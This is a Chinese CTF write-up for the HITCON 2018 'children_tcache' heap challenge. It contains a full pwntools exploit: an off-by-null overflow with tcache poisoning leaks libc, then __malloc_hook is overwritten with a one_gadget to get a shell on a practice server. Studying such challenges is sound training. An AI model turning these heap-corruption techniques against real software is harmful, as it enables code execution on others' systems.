image.png
    保护全开
    image.png
    这个判断会把输入中的 “\n” 转换成 “\x00”，这里存在溢出。要利用这个溢出，我们申请的 chunk 大小要为 0x100 的倍数，这样后面操作的时候可以绕过一些判断。
    大概思路就是下面图片这样
    image.png
    实现的时候
    image.png
    free 之后还有 memset。我们在做 tcache bin 溢出的时候，那个所谓的 prev_size 还需要进行一些操作，才能完成 unsorted bin 的大合并。

    # Seven allocate/free rounds on slot 0. The payload length is always
    # 0x68-i, matching the size requested in the same round, and both shrink
    # by one byte per round; the two bytes 0x90 0x04 stay at payload offsets
    # 0x60-0x61 throughout, only the trailing b'a' run gets shorter.
    # NOTE(review): the source listing carries no indentation, so free(0) is
    # placed inside the loop on the assumption that each round frees the
    # slot it just filled -- confirm against the author's intent.
    for i in range(7):
        payload = b'a'*0x60+b'\x90'+b'\x04'+b'a'*(6-i)
        creat(0x68-i,payload)
        free(0)

    尽管块管理机制会申请固定倍数长度的堆块，但实际上能写的堆块大小是有限的，我们可以通过上面的方法把 prev_size 改成我们想要的值。
    泄露 libc 的时候，我们为什么不选下面这个堆块来泄露 libc？因为 creat 会把 “\n” 变成 “\x00”；如果这里单独用 send 再配合合适的方法，也是搞得定的。image.png
    这是泄露 libc 的部分：

    # Leak stage. Every line is an ordered exchange with the target process,
    # so statement order is the entire contract of this listing; the same
    # sequence appears again, unchanged, inside the full script further down.
    creat(0x410,"aaa") #0
    creat(0x68,"bbb") #1
    creat(0x4f0,"ccc") #2
    creat(0x60,"ddd")
    free(1)
    free(0)
    # Seven allocate/free rounds on slot 0: payload length and requested size
    # are both 0x68-i and shrink together, one byte per round; the bytes
    # 0x90 0x04 remain at payload offsets 0x60-0x61.
    # NOTE(review): the source listing has no indentation; free(0) is taken
    # to be part of the loop body because the later "#0" comment on
    # creat(0x62, ...) implies slot 0 is free again after the loop.
    for i in range(7):
        payload = b'a'*0x60+b'\x90'+b'\x04'+b'a'*(6-i)
        creat(0x68-i,payload)
        free(0)
    # Same 0x60-byte prefix plus 0x90 0x04, without the trailing run.
    payload = b'a'*0x60+b'\x90'+b'\x04'
    creat(0x62,payload) #0
    free(2)
    creat(0x410,"eeeeee") #1
    # Read six bytes printed for slot 0 and pad to eight for u64().
    # NOTE(review): bytes.ljust with a str fill character is Python 2
    # behaviour; the script as written assumes Python 2 pwntools.
    show(0)
    addr = u64(io.recv(6).ljust(8,"\x00"))
    log.info("addr---------->"+hex(addr))
    # 4111520 is a hard-coded distance from the leaked pointer to the libc
    # base; it is tied to the specific libc build the page uses.
    libcbase = addr - 4111520
    log.info("libcbase------------>"+hex(libcbase))

    攻击的方式是通过这个 tcache bin 来实现的。

    1. from pwn import*
    context.log_level='debug'
    # Three successive bindings of io: only the last one (the remote
    # endpoint) is in effect when the rest of the script runs. The two
    # process() calls before it still spawn local instances of the binary
    # that are never closed; keeping exactly one of the three lines live
    # avoids the stray processes.
    io = process(['./HITCON_2018_children_tcache'],env={"LD_PRELOAD":"./libc-2.2764.so"})
    io = process("./HITCON_2018_children_tcache")
    io = remote("node4.buuoj.cn","27700")
    elf =ELF('./HITCON_2018_children_tcache')
    # The hard-coded offsets used later in this script (4111520, 0x4f322)
    # are specific to this exact libc file, not to the system libc below.
    libc = ELF("./libc-2.2764.so")
    #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    def debug():
        """Attach gdb to the live io tube, then pause() the script."""
        gdb.attach(io)
        pause()
    def creat(size,value):
        """Send menu choice 1, then answer the size and data prompts.

        size is sent as its decimal text; value is sent exactly as given,
        so the caller decides whether it is str or bytes.
        """
        exchange = (
            ("Your choice: ", "1"),
            ("Size:", str(size)),
            ("Data:", value),
        )
        for prompt, reply in exchange:
            io.recvuntil(prompt)
            io.sendline(reply)
    def show(index):
        """Send menu choice 2, then answer the index prompt with index in decimal."""
        for prompt, reply in (("Your choice: ", "2"), ("Index:", str(index))):
            io.recvuntil(prompt)
            io.sendline(reply)
    def free(index):
        """Send menu choice 3, then answer the index prompt with index in decimal."""
        def answer(prompt, reply):
            io.recvuntil(prompt)
            io.sendline(reply)

        answer("Your choice: ", "3")
        answer("Index:", str(index))
    # Interaction sequence. Every call is an ordered exchange with the target
    # process, so statement order is the entire contract of this block.
    creat(0x410,"aaa") #0
    creat(0x68,"bbb") #1
    creat(0x4f0,"ccc") #2
    creat(0x60,"ddd")
    free(1)
    free(0)
    # Seven allocate/free rounds on slot 0: payload length and requested size
    # are both 0x68-i and shrink together, one byte per round; the bytes
    # 0x90 0x04 remain at payload offsets 0x60-0x61.
    # NOTE(review): the source listing has no indentation; free(0) is taken
    # to be part of the loop body because the "#0" comment on the following
    # creat(0x62, ...) implies slot 0 is free again after the loop.
    for i in range(7):
        payload = b'a'*0x60+b'\x90'+b'\x04'+b'a'*(6-i)
        creat(0x68-i,payload)
        free(0)
    # Same 0x60-byte prefix plus 0x90 0x04, without the trailing run.
    payload = b'a'*0x60+b'\x90'+b'\x04'
    creat(0x62,payload) #0
    free(2)
    creat(0x410,"eeeeee") #1
    # Read six bytes printed for slot 0 and pad to eight for u64().
    # NOTE(review): bytes.ljust with a str fill character is Python 2
    # behaviour; the script as written assumes Python 2 pwntools.
    show(0)
    addr = u64(io.recv(6).ljust(8,"\x00"))
    log.info("addr---------->"+hex(addr))
    # 4111520 is a hard-coded distance from the leaked pointer to the libc
    # base; it is tied to the libc-2.2764.so loaded at the top of the script.
    libcbase = addr - 4111520
    log.info("libcbase------------>"+hex(libcbase))
    creat(0x60,"fff")
    free(0)
    free(2)
    #debug()
    # __malloc_hook is resolved from the libc symbol table relative to libcbase.
    malloc_hook = libcbase + libc.sym["__malloc_hook"]
    log.info("malloc_hook----------------->"+hex(malloc_hook))
    # Two allocations of the same size, each carrying the packed hook address.
    creat(0x60,p64(malloc_hook))
    creat(0x60,p64(malloc_hook))
    # 0x4f322 is another hard-coded offset specific to the same libc build.
    one_gadget = libcbase + 0x4f322
    log.info("one_gadget--------------->"+hex(one_gadget))
    creat(0x60,p64(one_gadget))
    #debug()
    # A final allocation request sent by hand rather than via creat():
    # only the size is answered and no "Data:" prompt is waited for.
    io.recvuntil("Your choice: ")
    io.sendline("1")
    io.recvuntil("Size:")
    io.sendline("20")
    #debug()
    io.interactive()